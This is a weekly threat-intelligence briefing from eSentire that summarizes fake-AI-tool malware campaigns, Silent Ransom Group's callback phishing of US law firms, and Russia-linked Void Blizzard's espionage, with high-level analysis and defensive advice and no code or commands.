eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
Cybercriminals Employ AI Lure to Distribute Malware
Bottom Line: Recent reports highlight a surge in malware distribution campaigns via fake AI tool installers and fake AI websites. These malware include ransomware, information stealers, remote access trojans, and backdoors.
On May 20th, a CheckPoint report and on May 27th, a Google Cloud report outlined that the threat actors have been leveraging fake Artificial Intelligence (AI) themed websites to drop malware on victim devices. These websites impersonate legitimate AI video generator platforms with functionalities such as text-to-video or image-to-video generation (Luma AI, Canva Dream Lab, and Kling AI).
As per the CheckPoint report, the attackers mimicked the Kling AI website and led traffic to the malicious webpage via Facebook malvertising. The victim's interaction with the fake Kling AI website generated a malicious ZIP archive containing a .NET loader that further deployed the second-stage payload, PureHVNC Remote Access Trojan (RAT). The activity targeted victims globally, with a major impact observed in Asia.
The Google Cloud report pointed out similar malware distribution activity associated with what they track as the UNC6032 campaign. The threat actors leveraged malicious advertisements posted on Facebook and LinkedIn to lure the victims to the fake AI video generator-themed websites. After users submit a video prompt, the fake site delivers a static payload from its own or related infrastructure, regardless of the input. On the website impersonating Luma AI, it was observed that a ZIP archive containing STARKVEIL dropper that deployed the XWORM and FROSTRIFT backdoors, and the GRIMPULL downloader was downloaded onto the victim’s device. UNC6032 campaign has been active since at least mid-2024 and is believed to be associated with a threat actor based in Vietnam. The campaign impacted victims across the United States, Europe, and Australia.
On May 29th, Cisco Talos published a report on the threat actors distributing fake AI tool installers to distribute malware, including CyberLock and Lucky_Gh0$t ransomware, and a newly identified malware dubbed Numero. The threat actors employed SEO-poisoning technique to distribute these installer packages on web browsers and social media platforms such as Telegram. CyberLock ransomware, a PowerShell-based ransomware, was distributed via a fraudulent AI website imitating the Nova Leads domain. The fake AI product download was a ZIP archive that included a .NET loader with a PowerShell script for deploying CyberLock ransomware embedded within it. Lucky_Gh0$t ransomware was being distributed as a fake ChatGPT installer. The self-extracting (SFX) ZIP installer, capable of evading detection, was observed to be downloaded on the victim’s device. User interaction with the installer resulted in a ransomware infection. Cisco Talos’s investigation identified a new malware with window manipulation capabilities. The malware tracked as Numero was observed imitating the InVideo AI video generator installer. This installer consisted of a Windows batch file, VB script, and the Numero executable. Numero is designed to run in a continuous loop with fixed pauses between executions, effectively rendering the victim’s Windows system unusable.
eSentire Threat Intelligence Analysis:
These reports highlight that as organizations increase adoption of AI, threat actors are leveraging the growing popularity of this technology to enhance the malware distribution techniques. Threat actors increasing use of AI tools in their operations is notable, but not surprising given that threat actors quickly operationalize trending topics and technologies as a means to conduct criminal activities.
Both CheckPoint and Google Cloud reports highlight that the targeted AI tools featured capabilities such as text-to-video or image-to-video generation. Threat actors effectively exploited the growing interest in Generative AI (GenAI) by distributing malicious payloads that were downloaded regardless of user input. According to Cisco Talos, the AI tools targeted by the threat actors are primarily used in B2B sales, marketing, and technology sectors to improve product presentations and strengthen market positioning. As a result, it's reasonable to conclude that individuals in these fields and those exploring GenAI capabilities or working in creative industries are at heightened risk from such malware distribution campaigns.
These campaigns made extensive use of malicious advertisements on widely used digital platforms like Facebook, Telegram, and LinkedIn. The expanding user base of these social media networks provides threat actors with an ideal environment to publish deceptive advertisements, broadening the scope and effectiveness of their operations. The use of malvertising to spread malicious AI packages is not new though. In August 2023, Trend Micro Researchers analyzed other LLM/AI-themed malvertising campaigns where information stealers were delivered to the victims. These social engineering tactics capitalize on the growing curiosity around AI tools, successfully steering users toward fake promotions under the guise of legitimate AI resources.
While the growing interest in AI technology is entirely understandable, it's equally important for users to be aware of the security risks that come with exploring emerging technologies. Organizations should ensure that the employees are educated on safer browsing practices to avoid visiting malicious sites. It is recommended that organizations implement browser-related security controls to support secure browsing efforts. To further protect assets from malicious downloads, it's crucial to ensure that all software is obtained only from trusted sources and implement policies that allow employees to download only from an authorized list of approved software. Alongside these security controls, implementation of robust Endpoint Detection and Response (EDR) solutions would assist in identifying and containing the malware deployed in the network.
The eSentire Threat Intelligence team is consistently tracking these campaigns for new detection opportunities.
FBI Issues Warning on Silent Ransom Group Targeting Law Firms
Bottom Line: The FBI warns that Silent Ransom Group is targeting U.S. law firms through callback phishing attacks, using fake subscription fees as bait to convince victims to install remote access tools, ultimately leading to data theft and extortion demands.
On May 23rd, 2025, the United States Federal Bureau of Investigation (FBI) released an advisory, warning organizations of ongoing phishing campaigns, being conducted by the financially motivated threat actor Silent Ransom Group (aka Luna Moth, Chatty Spider, UNC3753). The Silent Ransom Group is a threat actor group who first emerged in 2022 and is believed to be an offshoot of the Conti Ransomware group, following its collapse that same year. The Silent Ransom Group has been known to conduct callback phishing campaigns, which involve sending phishing emails to victims, with instructions to call a provided phone number for “further assistance”.
One of the campaigns reported by the FBI involves the Silent Ransom Group sending phishing emails to victims, masquerading as services which offer subscription plans. The emails indicate that the victims are being charged a small subscription fee, but to call the listed phone number to cancel the subscription. When victims call the phone number, the threat actors provide the victim with a URL, instructing them to download Remote Monitoring and Management (RMM) software, granting the threat actor remote access to the victim's device. The threat actors use this access to establish persistence on the host and seek out valuable information which they can exfiltrate and later use for extortion.
Another campaign observed by the FBI involves the Silent Ransom Group calling users while posing as a member of the organization's IT department, informing them that they need to complete work on the victim’s device overnight. The attack chain also involves the threat actor having the user download RMM tools, granting them access through a remote session, and the threat actors exfiltrating sensitive data using the Windows Secure Copy (WinSCP) or Rclone tools. In both campaigns, the threat actors will send a ransom email to the victim, threatening to sell or leak the stolen data if ransom demands are not met. The Silent Ransom Group is also known to call employees at a victim company in an attempt to apply pressure to the organization, to engage in ransom negotiations.
The FBI notes that the Silent Ransom Group has consistently been observed targeting law firms based within the United States, since Spring 2023. They note that the Silent Ransom Group has targeted other industries as well, including organizations within the medical and insurance industries, but that most of their victims appear to be law firms. The FBI theorizes that this may likely be due to the highly sensitive nature of data within the legal industry, and organizations may be more willing to pay a ransom in order to prevent this data from being leaked.
eSentire Threat Intelligence Analysis:
The technique of callback phishing has been given the name BazarCall (aka BazaCall), with Trellix indicating that the technique “first came into the limelight in late 2020”. The BazarCall technique was reported to be used by affiliates of the Conti ransomware group to deploy the BazaarLoader backdoor, leading to the deployment of Conti ransomware. As the Silent Ransom Group is believed to be an offshoot of the Conti ransomware group, this demonstrates their continued use of previously established Tactics, Techniques, and Procedures (TTPs).
The Silent Ransom Group has moved away from the data encryption component of Conti ransomware attacks, focusing solely on data exfiltration. This type of tactic change is not uncommon, with a recent example being Hunters International ransomware rebranding to World Leaks and moving to extortion-only attacks. These tactic changes may likely be attributed to the slow process of data encryption, along with Zscaler suggesting that removing this step eliminates “software development cycles and decryption support".
The abuse of RMM tools by threat actors is not a novel technique, with examples of these tools being deployed to conduct attacks in tech support scams and email bombing. Legitimate RMM tools are used by threat actors to establish remote connections to victim machines to conduct further attacks, as they allow attackers to bypass security protections and blend in with normal business operations. The abuse of RMM tools by threat actors allows them to establish a foothold in target organizations, and use this access to conduct follow-on attacks, including the deployment of ransomware. The Silent Ransom Group has continued to employ RMM tools in their attacks since its emergence, with the FBI having published a previous advisory on the threat group using this technique in 2023.
In order to protect against these types of attacks, organizations must develop policies to restrict the usage of unapproved RMM tools within environments, only allowing those that are used for legitimate business operations. Organizations should also implement Phishing and Security Awareness Training (PSAT) programs, which can be used to teach users how to identify and report malicious content. eSentire MDR for Endpoint has detections in place monitoring for suspicious activity involving RMM tools. eSentire's Threat Response Unit (TRU) continues to track this topic for additional detection opportunities.
New Russia-Affiliated Actor Void Blizzard Targets Critical Sectors for Espionage
Bottom Line: Microsoft in coordination with Dutch Intelligence agencies have identified a new Russian state-sponsored APT group, tracked as Void Blizzard. The group has been observed targeting various sectors in NATO nations to support Russian strategic objectives.
On May 27th, Microsoft released a report on Void Blizzard, also known as LAUNDRY BEAR. This newly identified Russia-affiliated threat actor has been conducting cyberespionage operations since at least April 2024. Microsoft Threat Intelligence assesses with high confidence that this group supports Russian government objectives by targeting entities of strategic interest. Although the group operates globally, it has a strong focus on organizations within NATO member states and Ukraine. The threat actor has primarily focused on organizations operating within the government, defense, telecommunications, transportation, healthcare, education, media, NGOs, intergovernmental organizations, and IT sectors. These attacks have largely affected institutions based in Europe and North America.
Void Blizzard typically gains initial access using low sophistication but effective methods. The threat actor frequently acquires stolen authentication credentials from infostealer marketplaces and uses them to conduct password spray attacks against Microsoft Exchange Online and SharePoint environments. These methods have allowed the actor to gain access to email systems and begin data collection. In April 2025, Void Blizzard began employing more targeted techniques, including an Adversary-in-the-Middle (AitM) spear phishing campaign. The campaign targeted over 20 organizations in the NGO sector across Europe and the United States. Victims received emails posing as invitations to the European Defense and Security Summit, which contained PDF attachments embedded with malicious QR codes. When scanned, the QR code redirected users to a phishing site where login credentials and session cookies were harvested using the Evilginx framework.
After obtaining valid credentials and gaining access to a victim organization, Void Blizzard exploits legitimate Microsoft cloud APIs such as Exchange Online and Microsoft Graph to enumerate and extract large volumes of data. This includes user emails, shared mailboxes, and files accessible through cloud storage. In some incidents, the threat actor accessed Microsoft Teams conversations through the web client to collect additional intelligence. Void Blizzard has also used AzureHound—a publicly available tool—to map Microsoft Entra ID configurations, including user roles, devices, applications, and group memberships within the victim's environment.
eSentire Threat Intelligence Analysis:
Netherlands General Intelligence and Security Service (AIVD), the Netherlands Defence Intelligence and Security Service (MIVD), and the US Federal Bureau of Investigation (FBI) collaborated with Microsoft in investigating the rising Void Blizzard activity. Although Void Blizzard’s tools and techniques are not particularly sophisticated, their operations have proven highly effective. The threat actor demonstrates that even basic credential-based attacks can lead to significant compromises. The group leveraged stolen authentication cookies, likely sourced from infostealer malware on criminal marketplaces, to bypass credential-based access controls. This reflects a trend where state-sponsored actors are operationalizing criminal infrastructure to facilitate espionage.
Microsoft highlighted that Void Blizzard compromised several user accounts at a Ukrainian aviation organization that had been previously targeted by Russian General Staff Main Intelligence Directorate (GRU) actor Seashell Blizzard in 2022. Many NATO countries, especially in Europe and North America, have been providing consistent military, political, and humanitarian support to Ukraine. This includes weapon systems, intelligence sharing, financial aid, and diplomatic backing. For Russia, these supporters could be perceived as indirect participants in the conflict. By targeting NATO-aligned organizations, Void Blizzard may seek to monitor military aid and defense planning, gain insight into diplomatic and policy decisions, or disrupt strategic collaboration between Ukraine and its allies.
The campaign notably involved the impersonation of the European Defense and Security Summit. By masquerading as trusted invitation emails, the attackers significantly increased the likelihood of the phishing emails being opened, thereby increasing the success rate of the attack. While the phishing emails in this campaign were more convincing than standard emails, user-education remains an effective security measure. While not an end solution to the threat of phishing, Multi-Factor Authentication (MFA) will significantly reduce the value of compromised credentials. As attackers cannot log into an account without the secondary authentication method, there are still significant barriers to overcome for threat actors attempting to employ the compromised credentials.
In response to the release of this report, the eSentire Threat Intelligence team has performed threat hunts across the client base and is actively monitoring this topic and exploring new detection opportunities.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
